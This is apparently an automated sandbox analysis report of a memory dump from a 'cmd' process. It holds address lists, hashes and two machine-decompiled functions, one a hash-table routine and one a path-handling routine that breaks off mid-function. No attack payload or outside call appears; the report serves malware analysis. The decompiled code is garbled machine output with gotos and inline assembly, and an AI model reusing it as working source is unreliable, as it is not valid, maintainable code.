0x03795d86
0x03795d95
0x03795d98
0x03795dba
0x03795dcb
0x03795dce
0x03795dd3
0x03795dd6
0x03795dd8
0x03795de6
0x03795dec
0x03795dee
0x03795df1
0x03795df3
0x0379635a
0x0379635a
0x00000000
0x0379635a
0x03795dfe
0x03795e02
0x03795e05
0x03795e07
0x03795e10
0x03795e13
0x03795e1b
0x03795e1c
0x03795e21
0x03795e22
0x03795e23
0x03795e25
0x03795e2a
0x03795e2c
0x03795e2e
0x03795e36
0x03795e39
0x03795e42
0x03795e47
0x03795e4d
0x03795e54
0x03795e54
0x03795e54
0x03795e2e
0x03795e5c
0x03795e5f
0x03795e62
0x03795e64
0x03795e6b
0x03795e70
0x03795e7a
0x03795e7a
0x03795e7a
0x03795e6b
0x03795e7e
0x03795e7f
0x03795e7f
0x03795e81
0x03795e87
0x03795e8b
0x03795e8c
0x03795e8c
0x03795e8c
0x03795e9a
0x03795e9c
0x03795ea2
0x03795ea6
0x03795f50
0x03795f50
0x03795f57
0x03795f66
0x03795f66
0x03795f66
0x03795f68
0x03795f6a
0x037963d0
0x00000000
0x03795f70
0x03795f70
0x03795f91
0x03795f9c
0x03795f9e
0x03795fa4
0x03795fa6
0x0379638c
0x03796392
0x037963a1
0x037963a7
0x037963af
0x037963af
0x037963bd
0x037963d8
0x00000000
0x037963d8
0x03795fac
0x03795fb2
0x03795fb4
0x03795fbd
0x03795fc6
0x03795fce
0x03795fd4
0x03795fdc
0x03795fec
0x03795fed
0x03795fee
0x03795fef
0x03795ff9
0x03795ffa
0x03795ffb
0x03795ffc
0x03796000
0x03796004
0x03796012
0x03796012
0x03796018
0x03796019
0x0379601a
0x0379601b
0x0379601c
0x03796020
0x03796059
0x0379605c
0x03796061
0x03796061
0x03796022
0x03796022
0x03796022
0x03796025
0x0379602a
0x0379602b
0x03796031
0x03796037
0x03796038
0x0379603e
0x03796048
0x03796049
0x0379604a
0x0379604b
0x0379604c
0x0379604d
0x03796053
0x03796054
0x03796054
0x03796062
0x03796065
0x03796067
0x0379606a
0x03796070
0x03796075
0x03796076
0x03796081
0x03796087
0x03796095
0x03796099
0x0379609e
0x037960a4
0x037960ae
0x037960b0
0x037960b3
0x037960b6
0x037960b8
0x037960ba
0x037960ba
0x037960ba
0x037960ba
0x037960be
0x037960c0
0x037960c5
0x037960c5
0x037960c5
0x037960c6
0x037960cd
0x03796114
0x037960cf
0x037960cf
0x037960d4
0x037960d5
0x037960da
0x037960db
0x037960e1
0x037960e2
0x037960e8
0x037960f8
0x037960fd
0x037960fe
0x03796102
0x03796104
0x03796107
0x03796109
0x0379610b
0x0379610b
0x0379610b
0x0379610b
0x0379610f
0x0379610f
0x03796117
0x0379611a
0x0379611f
0x03796125
0x03796134
0x03796139
0x0379613f
0x03796146
0x03796148
0x0379614b
0x0379614d
0x0379614f
0x0379614f
0x0379614f
0x0379614f
0x03796153
0x03796159
0x03796159
0x0379615c
0x03796163
0x03796169
0x0379616c
0x03796172
0x03796181
0x03796186
0x03796187
0x0379618b
0x03796191
0x03796195
0x037961a3
0x037961bb
0x037961c0
0x037961c3
0x037961cc
0x037961d0
0x037961dc
0x037961de
0x037961e1
0x037961e4
0x037961e6
0x037961e8
0x037961e8
0x037961e8
0x037961e8
0x037961e6
0x037961ec
0x037961f3
0x03796203
0x03796209
0x0379620a
0x03796216
0x0379621d
0x03796227
0x03796241
0x03796246
0x0379624c
0x03796257
0x03796259
0x0379625c
0x0379625e
0x03796260
0x03796260
0x03796260
0x03796260
0x0379625e
0x03796264
0x03796267
0x03796269
0x03796315
0x03796315
0x0379631b
0x0379631e
0x03796324
0x03796327
0x0379632f
0x03796330
0x03796333
0x0379633a
0x0379633c
0x03796335
0x03796335
0x03796335
0x0379633f
0x03796342
0x0379634c
0x03796352
0x03796355
0x03796355
0x03796359
0x00000000
0x0379626f
0x03796275
0x03796275
0x03796278
0x0379627e
0x0379627e
0x03796281
0x03796287
0x0379628d
0x03796298
0x0379629c
0x037962a2
0x0379629e
0x0379629e
0x0379629e
0x037962a7
0x037962a7
0x037962aa
0x037962b0
0x037962f0
0x037962f0
0x037962f2
0x037962f8
0x037962fd
0x037962b2
0x037962b2
0x037962b2
0x037962b5
0x037962dd
0x037962e2
0x037962e5
0x037962b7
0x037962b8
0x037962bb
0x037962bd
0x037962c0
0x037962c4
0x037962cd
0x037962cd
0x037962c0
0x037962bb
0x037962b5
0x03796302
0x03796303
0x03796305
0x03796305
0x03796305
0x0379630c
0x0379630c
0x00000000
0x0379627e
0x03796269
0x03795eac
0x03795ebb
0x03795ebe
0x03795ecb
0x03795ecb
0x03795ece
0x03795ece
0x03795ed4
0x03795ed7
0x03795ed9
0x03795edb
0x03795edb
0x03795ee1
0x03795ee1
0x03795ee3
0x03795f20
0x03795f20
0x03795ee5
0x03795ee5
0x03795ee5
0x03795ee8
0x03795f11
0x03795f18
0x03795eea
0x03795eea
0x03795eed
0x03795ef2
0x03795ef8
0x03795efb
0x03795f0a
0x03795f0a
0x03795eed
0x03795ee8
0x03795f22
0x03795f28
0x00000000
0x00000000
0x03795f30
0x03795f31
0x03795f37
0x03795f3a
0x03795f3d
0x03795f44
0x00000000
0x00000000
0x00000000
0x03795f46
0x03795f48
0x03795f4d
0x00000000
0x03795f4d
0x03795dda
0x03795ddf
0x00000000
0x03795ddf
0x03795dd8
0x03795da7
0x03795da9
0x03795dac
0x03795dae
0x00000000
0x03795db4
0x03795db4
0x00000000
0x03795db4
0x03795dae
0x03795d88
0x03795d8d
0x03796363
0x03796369
0x0379636a
0x03796370
0x03796372
0x0379637a
0x0379637b
0x0379637d
0x00000000
0x00000000
0x0379637f
0x03796385
0x00000000
0x03796385
0x03795d38
0x03795d3b
0x00000000
0x00000000
0x00000000
0x03795d3b
0x03795d27
0x03795d29
0x00000000
0x00000000
0x00000000
0x03796360
0x00000000
0x03796360
0x03795c10
0x03795c10
0x037963da
0x037963e5
0x037963e5

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 442cd02e4c174d59be3b7d4d62eee89626ed309f7c28c8c014c9e84beafaad4c
Instruction ID: 1d361e44692fe59e81226a561e0ce731bb8406df78a4c4737962b5c80911f156
Opcode Fuzzy Hash: 442cd02e4c174d59be3b7d4d62eee89626ed309f7c28c8c014c9e84beafaad4c
Instruction Fuzzy Hash: 7B425B75900229CFEF24CF68D880BA9F7B1FF49314F1982AAD94DAB242D7749985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0379E824 Relevance: .5, Instructions: 493
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E0379E824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x37bd360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L036EFAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E036EFA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x37bb1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E036E2280(E0370F3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														E036DFFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x37bb1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return E0370B640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E036FF3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x37bb1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x37bb1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = E0379E7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(E0379E7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(E0379E7A8(_t38) == 0) {
									_t406 = 0;
								}
								E036EFA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = E0379E7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}

0x0379e833
0x0379e839
0x0379e83e
0x0379e841
0x0379e848
0x0379e84b
0x0379e851
0x0379e8b2
0x0379e8b2
0x0379e8b5
0x0379e90b
0x0379e911
0x0379e913
0x0379e913
0x0379e91a
0x0379e91d
0x0379e922
0x0379e924
0x0379e924
0x0379e924
0x0379e92f
0x0379e933
0x0379e935
0x0379e93a
0x0379e940
0x0379e948
0x0379e950
0x0379e955
0x00000000
0x00000000
0x0379e957
0x0379e95c
0x0379e9cb
0x0379e9d2
0x0379e9d4
0x0379e9f2
0x0379e9f6
0x0379ea10
0x0379ea18
0x0379ea1a
0x0379ea1f
0x0379ea2c
0x0379ea2d
0x0379ea2e
0x0379ea32
0x0379ea3d
0x0379ea42
0x0379ea45
0x0379ea51
0x0379ea60
0x0379ea65
0x0379ea68
0x0379ea6a
0x0379ea6a
0x0379ea6a
0x0379ea6f
0x0379ea76
0x0379ea7c
0x0379ea7e
0x0379ea81
0x0379ea85
0x0379ea88
0x0379ea8c
0x0379ea8f
0x0379ea93
0x0379ea98
0x00000000
0x00000000
0x0379ea9a
0x0379ea9d
0x0379eaa2
0x0379eb0e
0x0379eb15
0x0379eb17
0x0379eb33
0x0379eb36
0x0379eb39
0x0379eb3f
0x0379eb45
0x0379eb4a
0x0379eb52
0x0379ecb1
0x0379ecb9
0x0379ecbe
0x0379ecc3
0x0379ecc6
0x0379eceb
0x0379ecee
0x0379ecf9
0x0379ecfe
0x0379ed00
0x0379ed05
0x0379ed07
0x0379ed0a
0x0379ed0c
0x0379ed0e
0x0379ed12
0x0379ed19
0x0379ed1e
0x0379ed24
0x0379ed2a
0x0379ed2a
0x0379ed2c
0x0379ed3e
0x0379ed3e
0x0379eb5a
0x0379eb62
0x0379eb69
0x00000000
0x00000000
0x0379eb6f
0x0379eb75
0x0379eb79
0x0379eb79
0x0379eb88
0x0379eb8e
0x0379eb90
0x0379eb92
0x0379eb97
0x0379ed3f
0x0379ed45
0x00000000
0x00000000
0x0379ed4b
0x0379ed4e
0x00000000
0x0379eb9d
0x0379eb9d
0x0379eb9d
0x0379eba2
0x0379ebb5
0x0379ebbc
0x0379ebbe
0x0379ebbe
0x0379ebc3
0x0379ebc5
0x0379ebcb
0x0379ebd2
0x0379ebd5
0x0379ebdb
0x0379ebdf
0x0379ebe1
0x0379ebf0
0x0379ebf9
0x0379ec04
0x0379ec07
0x0379ec0a
0x0379ec82
0x0379ec85
0x0379ec8b
0x0379ec91
0x0379ec93
0x0379ec96
0x0379ec9b
0x0379eca6
0x0379ecac
0x0379ecae
0x0379ecae
0x00000000
0x00000000
0x00000000
0x00000000
0x0379ec0c
0x0379ec0c
0x0379ec0c
0x0379ec0f
0x0379ec12
0x0379ec15
0x0379ec15
0x0379ec18
0x0379ec1e
0x00000000
0x00000000
0x0379ec22
0x0379ec28
0x0379ec4b
0x0379ec5b
0x0379ec5d
0x0379ec63
0x0379ec65
0x0379ec68
0x0379ec6b
0x0379ec6b
0x0379ec70
0x0379ec71
0x0379ec74
0x0379ec7d
0x00000000
0x0379ebe3
0x0379ebe3
0x0379ebe6
0x0379ebe6
0x0379ebe7
0x0379ebe9
0x0379ebec
0x00000000
0x0379ebe6
0x0379ebe1
0x0379eba4
0x0379eba9
0x0379ebb0
0x0379ebb3
0x00000000
0x00000000
0x00000000
0x00000000
0x0379ebab
0x0379ebab
0x0379ebab
0x0379ebac
0x0379ebac
0x00000000
0x0379ebab
0x0379eb97
0x0379eb19
0x0379eb1c
0x0379eb21
0x0379eb26
0x0379eb2c
0x0379eb2c
0x00000000
0x0379eb26
0x0379ead6
0x0379ead9
0x0379eadc
0x0379eadc
0x0379eadc
0x0379eade
0x0379eae4
0x00000000
0x00000000
0x0379eaee
0x0379eaf7
0x0379eaf9
0x00000000
0x00000000
0x0379eb04
0x0379eb12
0x00000000
0x0379eb12
0x0379eb06
0x00000000
0x0379eb06
0x0379eaf0
0x0379eaf2
0x0379eaf4
0x00000000
0x0379eaf4
0x0379ea6a
0x0379ea21
0x00000000
0x0379ea21
0x0379e9d6
0x0379e9d6
0x0379e9e0
0x0379e9e2
0x0379e9e2
0x0379e9e8
0x00000000
0x0379e9e8
0x0379e987
0x0379e98f
0x0379e992
0x0379e995
0x0379e995
0x0379e998
0x0379e998
0x0379e99a
0x0379e9a0
0x00000000
0x00000000
0x0379e9a9
0x0379e9b2
0x0379e9b4
0x00000000
0x00000000
0x0379e9ba
0x0379e9c1
0x0379e9cf
0x00000000
0x0379e9cf
0x0379e9c3
0x00000000
0x0379e9c3
0x0379e9ab
0x0379e9ad
0x0379e9af
0x00000000
0x0379e9af
0x0379e924
0x0379e8b7
0x0379e8ba
0x0379e902
0x0379e908
0x0379e90a
0x00000000
0x0379e90a
0x0379e8bc
0x0379e8bf
0x0379e8f9
0x0379e8ff
0x0379e901
0x00000000
0x0379e901
0x0379e8c1
0x0379e8c4
0x0379e8f0
0x0379e8f6
0x0379e8f8
0x00000000
0x0379e8f8
0x0379e8c6
0x0379e8c9
0x0379e8e7
0x0379e8ed
0x0379e8ef
0x00000000
0x0379e8ef
0x0379e8cb
0x0379e8ce
0x0379e8de
0x0379e8e4
0x0379e8e6
0x00000000
0x0379e8e6
0x0379e8d3
0x00000000
0x0379e8d5
0x0379e8db
0x0379e8dd
0x00000000
0x0379e8dd
0x0379e853
0x0379e855
0x0379e85b
0x0379e85d
0x0379e897
0x0379e89c
0x0379e8a2
0x0379e8a6
0x0379e8ab
0x0379e8ad
0x0379e8ad
0x00000000
0x0379e85d

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1740845d3b93119b5670235366e5d1568db445429aa5ae7e64a24ca7bff39f3b
Instruction ID: 8d28ade90e9546262ed4a933e69f3814c967818f28d433aab612a0384db29460
Opcode Fuzzy Hash: 1740845d3b93119b5670235366e5d1568db445429aa5ae7e64a24ca7bff39f3b
Instruction Fuzzy Hash: 2102D472E006158FDF18CFA9D89167EFBF6EF88210719866ED496EB780D634E901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 036E6E30 Relevance: .5, Instructions: 481
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E036E6E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
				char _v41;
				signed int _v48;
				short _v50;
				signed int _v52;
				signed short _v54;
				signed int _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed short _v70;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed short _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				char _v136;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t312;
				signed int _t313;
				char* _t315;
				unsigned int _t316;
				signed int _t317;
				short* _t319;
				void* _t320;
				signed int _t321;
				signed short _t327;
				signed int _t328;
				signed int _t335;
				signed short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed short _t352;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				void* _t365;
				signed int _t366;
				signed short* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t379;
				signed int _t384;
				signed int _t386;
				void* _t387;
				signed short _t389;
				intOrPtr* _t392;
				signed int _t397;
				unsigned int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t407;
				void* _t415;
				signed short _t417;
				unsigned int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				intOrPtr* _t433;
				signed int _t435;
				void* _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed short _t443;
				void* _t444;
				signed int _t445;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;

				_t425 = __edx;
				_push(0xfffffffe);
				_push(0x379fca8);
				_push(0x37117f0);
				_push( *[fs:0x0]);
				_t312 =  *0x37bd360;
				_v12 = _v12 ^ _t312;
				_t313 = _t312 ^ _t453;
				_v32 = _t313;
				_push(_t313);
				 *[fs:0x0] =  &_v20;
				_v116 = __edx;
				_t443 = __ecx;
				_v88 = __ecx;
				_t386 = _a4;
				_t433 = _a8;
				_v112 = _t433;
				_t315 = _a12;
				_v64 = _t315;
				_t392 = _a16;
				_v108 = _t392;
				if(_t433 != 0) {
					 *_t433 = 0;
				}
				if(_t315 != 0) {
					 *_t315 = 0;
				}
				if(_t425 > 0xffff) {
					_v116 = 0xffff;
				}
				 *_t392 = 0;
				 *((intOrPtr*)(_t392 + 4)) = 0;
				_t316 =  *_t443 & 0x0000ffff;
				_v104 = _t316;
				_t435 = _t316 >> 1;
				_v120 = _t435;
				if(_t435 == 0) {
					L124:
					_t317 = 0;
					goto L60;
				} else {
					_t319 =  *((intOrPtr*)(_t443 + 4));
					if( *_t319 != 0) {
						_t397 = _t435;
						_t320 = _t319 + _t435 * 2;
						_t425 = _t320 - 2;
						while(_t397 != 0) {
							if( *_t425 == 0x20) {
								_t397 = _t397 - 1;
								_t425 = _t425 - 2;
								continue;
							}
							if(_t397 == 0) {
								goto L124;
							}
							_t321 =  *(_t320 - 2) & 0x0000ffff;
							if(_t321 == 0x5c || _t321 == 0x2f) {
								_v57 = 0;
							} else {
								_v57 = 1;
							}
							_t399 = _v116 >> 1;
							_v92 = _t399;
							_v128 = _t399;
							E0370FA60(_t386, 0, _v116);
							_v56 = 0;
							_v52 = 0;
							_v50 = _v92 + _v92;
							_v48 = _t386;
							_t327 = E036E74C0(_t443);
							if(_t327 != 0) {
								_t389 = _t327 >> 0x10;
								_t328 = _t327 & 0x0000ffff;
								_v112 = _t328;
								_t437 = _v64;
								if(_t437 == 0) {
									L122:
									_t438 = _t328 + 8;
									_t401 = _v92;
									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
										_t209 = _t438 + 2; // 0xddeeddf0
										_t402 = _t209;
										asm("sbb eax, eax");
										_t317 =  !0xffff & _t402;
									} else {
										E036F9BC6( &_v52, 0x36a1080);
										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
										E03709377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
										_t317 = _t438;
									}
									goto L60;
								}
								if(_t389 != 0) {
									_t425 = _t389;
									_t335 = E037446A7(_t443, _t389, _t437);
									if(_t335 < 0) {
										goto L124;
									}
									if( *_t437 != 0) {
										goto L124;
									}
